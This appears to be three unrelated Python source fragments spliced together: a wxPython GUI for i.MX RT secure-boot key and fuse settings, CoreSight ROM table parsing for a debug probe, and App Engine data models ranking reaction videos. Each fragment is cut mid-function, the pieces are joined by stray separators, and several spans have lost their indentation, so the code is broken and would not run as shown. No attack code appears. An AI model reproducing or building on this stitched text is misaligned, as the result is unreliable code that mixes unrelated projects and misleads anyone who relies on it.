            self.m_panel_doAuth1_certInput.SetBackgroundColour( activeColor )
            self.m_textCtrl_serial.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
            self.m_textCtrl_keyPass.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
            self.m_panel_doAuth2_certFmt.Enable( True )
            self.m_panel_doAuth2_certFmt.SetBackgroundColour( activeColor )
            self.m_button_genCert.Enable( True )
            self.m_button_genCert.SetBackgroundColour( activeColor )
            self.m_panel_progSrk1_showSrk.Enable( True )
            self.m_panel_progSrk1_showSrk.SetBackgroundColour( activeColor )
            self.m_button_progSrk.Enable( True )
            self.m_button_progSrk.SetBackgroundColour( activeColor )
        self.Refresh()
    def setKeyStorageRegionColor( self ):
        """Recolour and repopulate the key-storage-region widgets (OTPMK vs user
        keys), then refresh the dependent certificate colours and FAC count.
        """
        self.keyStorageRegion = self.m_choice_keyStorageRegion.GetString(self.m_choice_keyStorageRegion.GetSelection())
        self.toolCommDict['keyStoreRegion'] = self.m_choice_keyStorageRegion.GetSelection()
        self.resetKeyStorageRegionColor()
        self.m_panel_prepHwCrypto1_hwCryptoKeyRegion.Enable( True )
        self.m_panel_prepHwCrypto1_hwCryptoKeyRegion.SetBackgroundColour( uidef.kBootSeqColor_Active )
        self.m_panel_prepHwCrypto2_hwCryptoAlgo.Enable( True )
        self.m_panel_prepHwCrypto2_hwCryptoAlgo.SetBackgroundColour( uidef.kBootSeqColor_Active )
        if self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FixedOtpmkKey:
            # Fixed OTPMK key: certificate is mandatory, a single crypto engine.
            self.m_choice_enableCertForHwCrypto.Clear()
            self.m_choice_enableCertForHwCrypto.SetItems(['Yes'])
            self.m_choice_enableCertForHwCrypto.SetSelection(0)
            self.setHwCryptoCertColor()
            self.m_choice_availHwCryptoEngines.Clear()
            self.m_choice_availHwCryptoEngines.SetItems(['1'])
            self.m_choice_availHwCryptoEngines.SetSelection(0)
            self.m_button_prepHwCrypto.Enable( True )
            self.m_button_prepHwCrypto.SetLabel(uilang.kMainLanguageContentDict['button_prepHwCrypto_p'][self.languageIndex])
            self.m_button_prepHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
        elif self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FlexibleUserKeys:
            # Flexible user keys: certificate optional; engine count depends on
            # whether BEE or OTFAD is the active HW crypto type.
            enableCertForHwCryptoTxt = self.m_choice_enableCertForHwCrypto.GetString(self.m_choice_enableCertForHwCrypto.GetSelection())
            self.m_choice_enableCertForHwCrypto.Clear()
            self.m_choice_enableCertForHwCrypto.SetItems(['No', 'Yes'])
            # Keep the user's previous Yes/No choice across the repopulation.
            self.m_choice_enableCertForHwCrypto.SetSelection(self.m_choice_enableCertForHwCrypto.FindString(enableCertForHwCryptoTxt))
            self.setHwCryptoCertColor()
            self.m_choice_availHwCryptoEngines.Clear()
            if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
                self.m_choice_availHwCryptoEngines.SetItems([str(RTyyyy_uidef.kMaxHwCryptoCount_Bee)])
            elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
                self.m_choice_availHwCryptoEngines.SetItems([str(RTyyyy_uidef.kMaxHwCryptoCount_Otfad)])
            else:
                pass
            self.m_choice_availHwCryptoEngines.SetSelection(0)
            self.m_button_prepHwCrypto.Enable( True )
            self.m_button_prepHwCrypto.SetLabel(uilang.kMainLanguageContentDict['button_prepHwCrypto_e'][self.languageIndex])
            self.m_button_prepHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_panel_operHwCrypto1_hwCryptoKeyInfo.Enable( True )
            self.m_panel_operHwCrypto1_hwCryptoKeyInfo.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_panel_operHwCrypto2_showGp4Dek.Enable( True )
            self.m_panel_operHwCrypto2_showGp4Dek.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_panel_operHwCrypto3_showSwgp2Dek.Enable( True )
            self.m_panel_operHwCrypto3_showSwgp2Dek.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_button_operHwCrypto.Enable( True )
            self.m_button_operHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
        else:
            pass
        # Maximum FAC (flash access control) region count also depends on BEE/OTFAD.
        self.m_choice_maxFacCnt.Clear()
        if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
            self.m_choice_maxFacCnt.SetItems([str(RTyyyy_uidef.kMaxFacRegionCount_Bee)])
        elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
            self.m_choice_maxFacCnt.SetItems([str(RTyyyy_uidef.kMaxFacRegionCount_Otfad)])
        else:
            pass
        self.m_choice_maxFacCnt.SetSelection(0)
        self.Refresh()
    def printSrkData( self, srkStr ):
        # Append one line of SRK hash text to the 256-bit SRK display box.
        self.m_textCtrl_srk256bit.write(srkStr + "\n")
    def clearSrkData( self ):
        self.m_textCtrl_srk256bit.Clear()
    def printHabDekData( self, dekStr ):
        # Append one line of HAB DEK text to the 128-bit DEK display box.
        self.m_textCtrl_habDek128bit.write(dekStr + "\n")
    def clearHabDekData( self ):
        self.m_textCtrl_habDek128bit.Clear()
    def printOtpmkDekData( self, dekStr ):
        # OTPMK DEK display is intentionally disabled; kept as a no-op stub.
        #self.m_textCtrl_otpmkDek128bit.write(dekStr + "\n")
        pass
    def clearOtpmkDekData( self ):
        # OTPMK DEK display is intentionally disabled; kept as a no-op stub.
        #self.m_textCtrl_otpmkDek128bit.Clear()
        pass
    def printGp4DekData( self, dekStr ):
        # Append one line of GP4 DEK text to the 128-bit DEK display box.
        self.m_textCtrl_gp4Dek128bit.write(dekStr + "\n")
    def clearGp4DekData( self ):
        self.m_textCtrl_gp4Dek128bit.Clear()
    def printSwGp2DekData( self, dekStr ):
        # Append one line of SW-GP2 DEK text to the 128-bit DEK display box.
        self.m_textCtrl_swgp2Dek128bit.write(dekStr + "\n")
    def clearSwGp2DekData( self ):
        self.m_textCtrl_swgp2Dek128bit.Clear()
def updateFuseGroupText( self ):
self.clearUserFuses()
if self.mcuSeries == uidef.kMcuSeries_iMXRT10yy:
self.m_button_fuse400.SetLabel('Lock')
self.m_staticText_fuse410.SetLabel('UUID0')
self.m_staticText_fuse420.SetLabel('UUID1')
self.m_staticText_fuse430.SetLabel('0x430')
self.m_staticText_fuse440.SetLabel('0x440')
self.m_button_fuse450.SetLabel('Cfg0')
self.m_button_fuse460.SetLabel('Cfg1')
self.m_button_fuse470.SetLabel('Cfg2')
self.m_staticText_fuse480.SetLabel('0x480')
self.m_staticText_fuse490.SetLabel('0x490')
self.m_staticText_fuse4a0.SetLabel('0x4a0')
self.m_staticText_fuse4b0.SetLabel('0x4b0')
self.m_staticText_fuse4c0.SetLabel('0x4c0')
self.m_staticText_fuse4d0.SetLabel('0x4d0')
| |
a CoreSightComponentID instance.
@param filter Optional filter callable. Must accept a CoreSightComponentID instance and
return a boolean indicating whether to perform the action (True applies action).
"""
for component in self._components:
# Recurse into child ROM tables.
if isinstance(component, ROMTable):
component.for_each(action, filter)
continue
# Skip component if the filter returns False.
if filter is not None and not filter(component):
continue
# Perform the action.
action(component)
class Class1ROMTable(ROMTable):
"""! @brief CoreSight Class 0x1 ROM table component and parser.
An object of this class represents a CoreSight Class 0x1 ROM table. It supports reading the table
and any child tables. For each entry in the table, a CoreSightComponentID object is created
that further reads the component's CoreSight identification registers.
Granular Power Requestor (GPR) components are supported to automatically enable power domains
required to access components, as indicated by the component entry in the ROM table.
"""
# Constants for Class 0x1 ROM tables.
ROM_TABLE_ENTRY_PRESENT_MASK = 0x1
# Mask for ROM table entry size. 1 if 32-bit entries.
ROM_TABLE_32BIT_FORMAT_MASK = 0x2
# ROM table entry power ID fields.
ROM_TABLE_POWERIDVALID_MASK = 0x4
ROM_TABLE_POWERID_MASK = 0x01f0
ROM_TABLE_POWERID_SHIFT = 4
# 2's complement offset to debug component from ROM table base address.
ROM_TABLE_ADDR_OFFSET_NEG_MASK = 0x80000000
ROM_TABLE_ADDR_OFFSET_MASK = 0xfffff000
ROM_TABLE_MAX_ENTRIES = 960
def _read_table(self):
entryAddress = self.address
foundEnd = False
entriesRead = 0
entryNumber = 0
while not foundEnd and entriesRead < self.ROM_TABLE_MAX_ENTRIES:
# Read several entries at a time for performance.
readCount = min(self.ROM_TABLE_MAX_ENTRIES - entriesRead, self.ROM_TABLE_ENTRY_READ_COUNT)
entries = self.ap.read_memory_block32(entryAddress, readCount)
entriesRead += readCount
for entry in entries:
# Zero entry indicates the end of the table.
if entry == 0:
foundEnd = True
break
try:
self._handle_table_entry(entry, entryNumber)
except exceptions.TransferError as err:
LOG.error("Error attempting to probe CoreSight component referenced by "
"ROM table entry #%d: %s", entryNumber, err,
exc_info=self.session.get_current().log_tracebacks)
entryAddress += 4
entryNumber += 1
def _power_component(self, number, powerid, entry):
if self.gpr is None:
LOG.warning("ROM table entry #%d specifies power ID #%d, but no power requestor "
"component has been seen; skipping component (entry=0x%08x)",
number, powerid, entry)
return False
# Power up the domain.
if not self.gpr.power_up_one(powerid):
LOG.error("Failed to power up power domain #%d", powerid)
return False
else:
LOG.info("Enabled power to power domain #%d", powerid)
return True
def _handle_table_entry(self, entry, number):
    """Parse a single class 0x1 ROM table entry and create its component.

    Skips entries marked not-present or using the (unsupported) 8-bit entry
    format. GPR components are instantiated immediately so subsequent entries
    can be powered; child ROM tables are recursed into.
    """
    # Nonzero entries can still be disabled, so check the present bit before handling.
    if (entry & self.ROM_TABLE_ENTRY_PRESENT_MASK) == 0:
        return
    # Verify the entry format is 32-bit.
    if (entry & self.ROM_TABLE_32BIT_FORMAT_MASK) == 0:
        return
    # Get the component's top 4k address.
    offset = entry & self.ROM_TABLE_ADDR_OFFSET_MASK
    if (entry & self.ROM_TABLE_ADDR_OFFSET_NEG_MASK) != 0:
        # Negative 2's complement offset: invert within the fixed bit width,
        # then Python's ~ yields the arbitrary-precision negative value.
        offset = ~bit_invert(offset)
    address = self.address + offset
    # Check power ID.
    if (entry & self.ROM_TABLE_POWERIDVALID_MASK) != 0:
        powerid = (entry & self.ROM_TABLE_POWERID_MASK) >> self.ROM_TABLE_POWERID_SHIFT
        # Attempt to power up this component. Skip this component if the attempt fails.
        if not self._power_component(number, powerid, entry):
            return
    else:
        powerid = None
    # Create component instance.
    cmpid = CoreSightComponentID(self, self.ap, address, powerid)
    cmpid.read_id_registers()
    # Is this component a power requestor?
    if cmpid.factory == GPR.factory:
        # Create the GPR instance and stash it so later entries can be powered.
        self.gpr = cmpid.factory(self.ap, cmpid, None)
        self.gpr.init()
    LOG.info("%s[%d]%s", self.depth_indent, number, str(cmpid))
    # Recurse into child ROM tables.
    if cmpid.is_rom_table:
        cmp = ROMTable.create(self.ap, cmpid, address, parent_table=self)
        cmp.init()
    else:
        cmp = cmpid
    if cmp is not None:
        self.components.append(cmp)
class Class9ROMTable(ROMTable):
"""! @brief CoreSight Class 0x9 ROM table component and parser.
Handles parsing of class 0x9 ROM tables as defined in ADIv6.
In addition to GPR (Granular Power Requestor) components for power domain management, this class
supports the optional power request functionality present in class 0x9 ROM tables.
"""
# Constants for Class 0x9 ROM tables.
# Entry present field (2 bits) and its defined values.
ROM_TABLE_ENTRY_PRESENT_MASK = 0x3
ROM_TABLE_ENTRY_POWERIDVALID_MASK = 0x4
ROM_TABLE_ENTRY_POWERID_MASK = 0x01f0
ROM_TABLE_ENTRY_POWERID_SHIFT = 4
ROM_TABLE_ENTRY_NOT_PRESENT_FINAL = 0x0
ROM_TABLE_ENTRY_NOT_PRESENT_NOT_FINAL = 0x2
ROM_TABLE_ENTRY_PRESENT = 0x3
# Power/reset/authentication register offsets within the ROM table's 4 kB region.
ROM_TABLE_DBGPCRn = 0xa00
ROM_TABLE_DBGPSRn = 0xa80
ROM_TABLE_SYSPCRn = 0xb00
ROM_TABLE_SYSPSRn = 0xb80
ROM_TABLE_PRIDR0 = 0xc00
ROM_TABLE_DBGRSTRR = 0xc10
ROM_TABLE_DBGRSTAR = 0xc14
ROM_TABLE_SYSRSTRR = 0xc18
ROM_TABLE_SYSRSTAR = 0xc1c
ROM_TABLE_AUTHSTATUS = 0xfb8
# DBGPCRn / DBGPSRn bit fields.
ROM_TABLE_DBGPCRn_PRESENT_MASK = 0x00000001
ROM_TABLE_DBGPCRn_PR_MASK = 0x00000002
ROM_TABLE_DBGPSRn_PS_MASK = 0x00000003
ROM_TABLE_DBGPSRn_PS_MAYBE_NOT_POWERED = 0x0
ROM_TABLE_DBGPSRn_PS_IS_POWERED = 0x1
ROM_TABLE_DBGPSRn_PS_MUST_REMAIN_POWERED = 0x3
ROM_TABLE_PRIDR0_VERSION_MASK = 0x0000000f
ROM_TABLE_PRIDR0_VERSION = 1 # Current version number of the power request functionality.
# DEVID flag masks: COM Port, power request functionality, system memory, entry format.
ROM_TABLE_DEVID_CP_MASK = 0x00000040
ROM_TABLE_DEVID_PRR_MASK = 0x00000020
ROM_TABLE_DEVID_SYSMEM_MASK = 0x00000010
ROM_TABLE_DEVID_FORMAT_MASK = 0x0000000f
ROM_TABLE_FORMAT_32BIT = 0x0
ROM_TABLE_FORMAT_64BIT = 0x1
ROM_TABLE_MAX_ENTRIES = 512 # Maximum 32-bit entries.
# 2's complement offset to debug component from ROM table base address.
ROM_TABLE_ADDR_OFFSET_NEG_MASK = { 32: (1 << 31), 64: (1 << 63) }
ROM_TABLE_ADDR_OFFSET_MASK = { 32: 0xfffff000, 64: 0xfffffffffffff000 }
# 5 second timeout on power domain requests.
POWER_REQUEST_TIMEOUT = 5.0
def __init__(self, ap, cmpid=None, addr=None, parent_table=None):
    """! @brief Component constructor.

    Caches DEVID-derived capability flags (COM Port, power request
    functionality, system-memory presence) and the entry width (32/64-bit).
    """
    super(Class9ROMTable, self).__init__(ap, cmpid, addr, parent_table)
    # Lazily-determined version of the power request functionality; None until checked.
    self._pridr_version = None
    # Extract flags from DEVID.
    self._has_com_port = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_CP_MASK) != 0)
    self._has_prr = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_PRR_MASK) != 0)
    self._is_sysmem = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_SYSMEM_MASK) != 0)
    # Any nonzero FORMAT field means 64-bit entries (only 0x0 and 0x1 are defined).
    is_64bit = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_FORMAT_MASK) != 0)
    self._width = 64 if is_64bit else 32
    LOG.debug("cp=%d prr=%d sysmem=%d w=%d", self._has_com_port, self._has_prr, self._is_sysmem, self._width)
@property
def has_com_port(self):
    """! @brief Whether the ROM table includes COM Port functionality.
    @return bool
    """
    return self._has_com_port
@property
def has_prr(self):
    """! @brief Whether the ROM table includes power and reset requesting functionality.
    @return bool
    """
    return self._has_prr
@property
def is_sysmem(self):
    """! @brief Whether the ROM table is present in system memory.
    @return bool
    """
    return self._is_sysmem
def _read_table(self):
    """! @brief Reads and parses the ROM table.

    Entries are read in batches and parsed until a "not present, final" (0x0)
    entry or the table's maximum entry count is reached. Entries marked
    "not present, not final" (0x2) are skipped, with the entry address and
    number still advancing.
    """
    # Compute multipliers for 32- or 64-bit.
    entrySizeMultiplier = self._width // 32
    actualMaxEntries = self.ROM_TABLE_MAX_ENTRIES // entrySizeMultiplier
    # Ensure 64-bit format is read as pairs of 32-bit values.
    entryReadCount = align_down(self.ROM_TABLE_ENTRY_READ_COUNT, entrySizeMultiplier)
    entryAddress = self.address
    foundEnd = False
    entriesRead = 0
    entryNumber = 0
    while not foundEnd and entriesRead < actualMaxEntries:
        # Read several entries at a time for performance.
        readCount = min(actualMaxEntries - entriesRead, entryReadCount)
        entries = self.ap.read_memory_block32(entryAddress, readCount)
        entriesRead += readCount
        # For 64-bit entries, combine pairs of 32-bit values into single 64-bit value.
        # NOTE(review): `pairwise` here must yield non-overlapping (lo, hi)
        # pairs — a project helper, not itertools.pairwise; confirm.
        if self._width == 64:
            entries = [(lo | (hi << 32)) for lo, hi in pairwise(entries)]
        for entry in entries:
            present = entry & self.ROM_TABLE_ENTRY_PRESENT_MASK
            # Zero entry indicates the end of the table.
            if present == self.ROM_TABLE_ENTRY_NOT_PRESENT_FINAL:
                foundEnd = True
                break
            elif present == self.ROM_TABLE_ENTRY_PRESENT:
                try:
                    self._handle_table_entry(entry, entryNumber)
                except exceptions.TransferError as err:
                    LOG.error("Error attempting to probe CoreSight component referenced by "
                            "ROM table entry #%d: %s", entryNumber, err,
                            exc_info=self.session.get_current().log_tracebacks)
            entryAddress += 4 * entrySizeMultiplier
            entryNumber += 1
def _power_component(self, number, powerid, entry):
    """! @brief Enable power to a component defined by a ROM table entry.

    Uses the table's own power request functionality when present; otherwise
    falls back to the GPR-based mechanism of the base class. Returns True on
    success, False when the component should be skipped.
    """
    if not self._has_prr:
        # No power request functionality in this table; attempt the GPR method.
        return super(Class9ROMTable, self)._power_component(number, powerid, entry)
    # Check the version first so we can provide a nice warning message.
    if not self.check_power_request_version():
        LOG.warning("Class 0x9 ROM table #%d @ 0x%08x has unsupported version (%d) of power "
                    "request functionality, needed for entry #%d (entry=0x%08x). Skipping "
                    "component.", self.depth, self.address, self._pridr_version, number, entry)
        return False
    if self.power_debug_domain(powerid):
        LOG.info("Enabled power to power domain #%d", powerid)
        return True
    LOG.error("Failed to power up power domain #%d", powerid)
    return False
def _handle_table_entry(self, entry, number):
"""! @brief Parse one ROM table entry."""
# Get the component's top 4k address.
offset = entry & self.ROM_TABLE_ADDR_OFFSET_MASK[self._width]
if (entry & self.ROM_TABLE_ADDR_OFFSET_NEG_MASK[self._width]) != 0:
offset = ~bit_invert(offset, width=self._width)
address = self.address + offset
# Check power ID.
if (entry & self.ROM_TABLE_ENTRY_POWERIDVALID_MASK) != 0:
powerid = (entry & self.ROM_TABLE_ENTRY_POWERID_MASK) >> self.ROM_TABLE_ENTRY_POWERID_SHIFT
# Attempt to power up this component. Skip this component if we the attempt fails.
if not self._power_component(number, powerid, entry):
return
else:
powerid = None
# Create component instance.
cmpid = CoreSightComponentID(self, self.ap, address, powerid)
cmpid.read_id_registers()
# Is this component a power requestor?
if cmpid.factory == GPR.factory:
# Create the GPR instance and stash it.
self.gpr = cmpid.factory(self.ap, cmpid, None)
self.gpr.init()
LOG.info("%s[%d]%s", self.depth_indent, | |
k in self.reactions]
if version >= 29:
data['url'] = self.url
else:
data['audio_url'] = self.legacy_url
if version >= 32:
data['external_plays'] = self.external_plays
if version >= 33:
data['external_content_id'] = self.external_content_id
if version >= 35:
data['attachments'] = self.attachments
return data
def public(self, version=None, **kwargs):
    """Return the public API dict for this chunk, keyed by its own entity id.

    Extra kwargs are accepted for interface compatibility but ignored here.
    """
    return self.public_for_chunk_id(self.key.id(), version)
@property
def reactions(self):
    """Mapping of reacting account key -> reaction type (emoji)."""
    # Make sure the parallel lists are consistent before zipping them.
    self._upgrade_reactions()
    return {key: kind for key, kind in zip(self.reaction_keys, self.reaction_types)}
def set_reaction(self, account_key, reaction_type):
    """Add, change, or (with reaction_type=None) remove one account's reaction."""
    self._upgrade_reactions()
    if account_key in self.reaction_keys:
        index = self.reaction_keys.index(account_key)
        if reaction_type is None:
            # Remove the reaction entirely, keeping the lists parallel.
            del self.reaction_keys[index]
            del self.reaction_types[index]
        else:
            self.reaction_types[index] = reaction_type
    elif reaction_type is not None:
        self.reaction_keys.append(account_key)
        self.reaction_types.append(reaction_type)
@property
def text(self):
    """Space-joined transcript of all text segments."""
    return ' '.join(s.text for s in self.text_segments)
@property
def url(self):
    """Storage URL for this chunk's payload."""
    return files.storage_url(self.payload)
@property
def legacy_url(self):
    """Legacy (pre-CDN) URL for this chunk's payload."""
    return files.legacy_url(self.payload)
def _upgrade_reactions(self):
    """Repair legacy entities where reaction types were not stored.

    Older data recorded only reaction_keys; backfill reaction_types with the
    default thumbs-up emoji so the two lists stay parallel.
    """
    if len(self.reaction_keys) != len(self.reaction_types):
        self.reaction_types = [u'👍'] * len(self.reaction_keys)
class ChunkInStream(Chunk):
    """A denormalized copy of a Chunk embedded in a stream.

    NOTE(review): uses Python 2 idioms (itervalues). Property values are
    copied via the descriptor protocol, skipping computed properties.
    """
    # Points to the real chunk.
    chunk_id = ndb.IntegerProperty()
    @classmethod
    def from_chunk(cls, chunk):
        """Build a ChunkInStream copy of `chunk`, excluding computed properties."""
        props = dict((p._code_name, p.__get__(chunk, Chunk))
                     for p in Chunk._properties.itervalues()
                     if type(p) is not ndb.ComputedProperty)
        return cls(chunk_id=chunk.key.id(), **props)
    def public(self, version=None, **kwargs):
        """Public representation delegates to the real chunk's id."""
        return self.public_for_chunk_id(self.chunk_id, version)
class Config(ndb.Model):
    # Arbitrary JSON configuration value, keyed by the entity id.
    value = ndb.JsonProperty()
class YouTubeIdProperty(ndb.StringProperty):
    """StringProperty tolerating legacy None values.

    Migration patch: old non-repeated values may be None, which a repeated
    StringProperty rejects; map None to the empty string or skip validation.
    """
    def _from_base_type(self, value):
        # This is a patch to support migration from non-repeated values that were None.
        if value is None:
            logging.debug('Had to convert None to u\'\' in _from_base_type')
            return u''
        return super(YouTubeIdProperty, self)._from_base_type(value)
    def _to_base_type(self, value):
        if value is None:
            logging.debug('Had to convert None to u\'\' in _to_base_type')
            return u''
        return super(YouTubeIdProperty, self)._to_base_type(value)
    def _validate(self, value):
        if value is None:
            logging.debug('Had to ignore None in _validate')
            return
        return super(YouTubeIdProperty, self)._validate(value)
class Content(ndb.Model):
    """A piece of content (original video or reaction) plus ranking counters."""
    CDN_BASE_URL = 'https://d32au24mly9y2n.cloudfront.net'
    # Recognized prefixes of our own upload URLs (most specific first).
    UPLOAD_URL_ROOTS = [
        'https://d32au24mly9y2n.cloudfront.net/hls/',
        'https://d32au24mly9y2n.cloudfront.net/',
        'https://s.reaction.cam/hls/',
        'https://s.reaction.cam/',
        'https://storage.googleapis.com/rcam/',
    ]
    comment_count = ndb.IntegerProperty(default=0)
    created = ndb.DateTimeProperty()
    creator = ndb.KeyProperty(Account, required=True)
    creator_twitter = ndb.StringProperty(indexed=False)
    # Free-form string used to detect duplicate uploads.
    dedupe = ndb.StringProperty()
    duration = ndb.IntegerProperty(default=0, indexed=False)
    # First account to react to this content (see add_related_count).
    first_related_creator = ndb.KeyProperty(Account)
    metadata = ndb.JsonProperty()
    original_url = ndb.StringProperty()
    properties = ndb.JsonProperty()
    related_count = ndb.IntegerProperty(default=0)
    # The original this content reacts to, if any.
    related_to = ndb.KeyProperty(kind='Content')
    request = ndb.KeyProperty(kind='ContentRequestPublic')
    slug = ndb.StringProperty()
    # Engagement bonus accumulated so far, and the decay penalty already deducted.
    sort_bonus = ndb.IntegerProperty(default=0)
    sort_bonus_penalty = ndb.IntegerProperty(default=0, indexed=False)
    sort_index = ndb.IntegerProperty()
    tags = ndb.StringProperty(repeated=True)
    tags_history = ndb.StringProperty(indexed=False, repeated=True)
    thumb_url_ = ndb.StringProperty('thumb_url', indexed=False)
    title = ndb.StringProperty(indexed=False)
    useragent = ndb.StringProperty(indexed=False)
    video_url_ = ndb.StringProperty('video_url', indexed=False)
    # Raw and bot-filtered counters.
    views = ndb.IntegerProperty(default=0)
    views_real = ndb.IntegerProperty(default=0)
    votes = ndb.IntegerProperty(default=0)
    votes_real = ndb.IntegerProperty(default=0)
    youtube_broken = ndb.BooleanProperty(default=False, indexed=False)
    # All YouTube ids this content has had (stored under legacy name 'youtube_id').
    youtube_id_history = YouTubeIdProperty('youtube_id', repeated=True)
    youtube_reaction_views = ndb.IntegerProperty()
    youtube_reaction_views_updated = ndb.DateTimeProperty(indexed=False)
    youtube_views = ndb.IntegerProperty()
    youtube_views_updated = ndb.DateTimeProperty(indexed=False)
def add_comment_count(self, account, count=1):
    """Adjust the comment counter and award a trending bonus for non-creator comments."""
    # Never let the counter go below zero.
    if count < 0:
        count = max(count, -self.comment_count)
    self.comment_count += count
    if account.key == self.creator:
        return
    # Bonus scales with the commenting account's quality tier and followers.
    quality = account.quality
    if quality >= 4:
        bonus = 2000
    elif quality == 3:
        bonus = 1500
    elif quality == 2:
        bonus = 750 + min(account.follower_count * 5, 250)
    elif quality == 1:
        bonus = 250 + min(account.follower_count * 5, 500)
    else:
        bonus = 100
    self.add_sort_index_bonus(bonus * count)
def add_related_count(self, account, count=1, account_reacted_already=False):
    """Adjust the reaction counter and trending bonuses.

    Returns True if this call resulted in first_related_creator being set.
    """
    first = False
    # Never let the counter go below zero.
    if count < 0 and -count > self.related_count:
        count = -self.related_count
    self.related_count += count
    if self.related_count > 0:
        self.add_tag('is reacted', allow_restricted=True)
    # Creator reactions to their own content earn nothing.
    if account.key == self.creator:
        return False
    if account.key == self.first_related_creator:
        account_reacted_already = True
    if count > 0 and not self.first_related_creator:
        if self.related_count < 3:
            # Bump the content sort index as if it was just created.
            i = self.get_sort_index() + self.sort_bonus - self.sort_bonus_penalty
            self.sort_index = max(i, self.sort_index)
        self.first_related_creator = account.key
        first = True
    # Bonus scales with the reacting account's quality tier and followers.
    if account.quality > 1:
        bonus = 13000 + account.quality * (1000 + min(account.follower_count * 100, 2000))
    elif account.quality == 1:
        bonus = 2500 + min(account.follower_count * 200, 5000)
    else:
        bonus = 500
    if account_reacted_already:
        # Don't let one user make content trend.
        bonus //= 100
    self.add_sort_index_bonus(bonus * count)
    if 'is hot' in self.tags and self.related_count >= (6 if self.related_to else 3):
        # Allow reactions to become originals with enough reactions.
        self.add_tag('original', allow_restricted=True)
    return first
def add_sort_index_bonus(self, bonus):
    """Apply an engagement bonus to sort_index with an age-based decay penalty.

    The effective bonus shrinks quadratically with (age in seconds +
    accumulated bonus); 186624000000 == 432000**2, i.e. full decay around
    432000 (five days in seconds). NOTE(review): the formula mixes seconds
    and bonus points in one term — presumably intentional; confirm before
    changing.
    """
    # Clamp so the stored bonus never goes negative.
    if bonus < 0 and -bonus > self.sort_bonus:
        bonus = -self.sort_bonus
    age = (datetime.utcnow() - self.created).total_seconds()
    val = float(age + self.sort_bonus) ** 2 / 186624000000
    # At least 10% of the bonus always applies.
    bonus_w_penalty = int(bonus * min(max(1 - val, 0.1), 1))
    self.sort_bonus += bonus
    self.sort_bonus_penalty += bonus - bonus_w_penalty
    self.sort_index += bonus_w_penalty
    if self.sort_bonus > 50000:
        self.add_tag('is hot', allow_restricted=True)
def add_tag(self, tag, **kwargs):
    """Add a single tag (convenience wrapper around add_tags)."""
    self.add_tags([tag], **kwargs)
def add_tags(self, tags, allow_restricted=False, **kwargs):
    """Add one or more tags, parsing strings and filtering restricted tags."""
    if isinstance(tags, basestring):
        tags = self.parse_tags(tags, allow_restricted=allow_restricted)
    else:
        # Each element may itself be a separated tag string; flatten the result.
        tags = set(tt for t in tags for tt in self.parse_tags(t, allow_restricted=allow_restricted))
    self.set_tags(set(self.tags) | tags, allow_restricted=allow_restricted, **kwargs)
def add_view_count(self, account, is_bot=False, count=1):
    """Record `count` views and award a small trending bonus.

    Note: `account` may be None since anonymous users can watch videos.
    """
    if not account or account.key != self.creator:
        # Bot views are worth a fifth of a real view's bonus.
        self.add_sort_index_bonus((1 if is_bot else 5) * count)
    self.views += count
    if not is_bot:
        self.views_real += count
def add_vote_count(self, account, is_bot=False, count=1):
    """Record `count` votes, award a quality-scaled bonus, keep views >= votes."""
    if account.key != self.creator:
        # Bonus scales with the voting account's quality tier and followers.
        quality = account.quality
        if quality >= 4:
            bonus = 5000
        elif quality == 3:
            bonus = 4000
        elif quality == 2:
            bonus = 2000 + min(account.follower_count * 5, 1000)
        elif quality == 1:
            bonus = 1000 + min(account.follower_count * 5, 1000)
        else:
            bonus = 500
        if is_bot:
            # Bot votes are worth a tenth.
            bonus //= 10
        self.add_sort_index_bonus(bonus * count)
    self.votes += count
    # A vote implies at least one view.
    if self.views < self.votes:
        self.views = self.votes
    if not is_bot:
        self.votes_real += count
def became_public(self, creator, related_to=None, first_time=False):
    """Hook run when content becomes publicly visible.

    Applies publishing tags, a one-time creator-quality bonus, and (for
    reactions) transfers simple tags from the original.
    NOTE(review): `first_time` is accepted but unused in this method.
    """
    # Public tags logic.
    if creator.publish:
        # Add the published tag for whitelisted accounts.
        self.add_tag('published', allow_restricted=True)
    # Initial content bonus.
    if creator.quality >= 4:
        self.add_sort_index_bonus(16000)
    elif creator.quality == 3:
        self.add_sort_index_bonus(15000)
    elif creator.quality == 2:
        self.add_sort_index_bonus(10000)
    elif creator.quality == 1:
        self.add_sort_index_bonus(1000)
    # Remaining logic is only for reactions.
    if not related_to:
        return
    # Transfer tags from original to content.
    for tag in related_to.tags:
        # Multi-word and explicitly non-transferable tags stay on the original.
        if ' ' in tag or tag in config.NON_TRANSFERABLE_TAGS:
            continue
        self.add_tag(tag)
@classmethod
def clean_title(cls, title):
    """Strip known trailing site suffixes (currently " - YouTube") and whitespace."""
    for suffix in (u' - YouTube',):
        if title.endswith(suffix):
            title = title[:-len(suffix)]
    return title.strip()
@classmethod
def decorate(cls, content_list, include_creator=False, include_related=False, for_account_key=None):
    """Batch-fetch related entities for a list of content in one ndb call.

    Returns (lookup, votes): `lookup` maps entity key -> entity for creators
    and originals; `votes` is a per-content list of ContentVote entities (or
    None placeholders when `for_account_key` is not given).
    """
    keys = []
    if include_creator:
        keys.extend({c.creator for c in content_list})
    if include_related:
        keys.extend({c.related_to for c in content_list if c.related_to})
    if for_account_key:
        # Also look up votes for every piece of content.
        keys.extend(ndb.Key('ContentVote', c.key.id(), parent=for_account_key)
                    for c in content_list)
    if not keys:
        return {}, [None] * len(content_list)
    entities = ndb.get_multi(keys)
    if for_account_key:
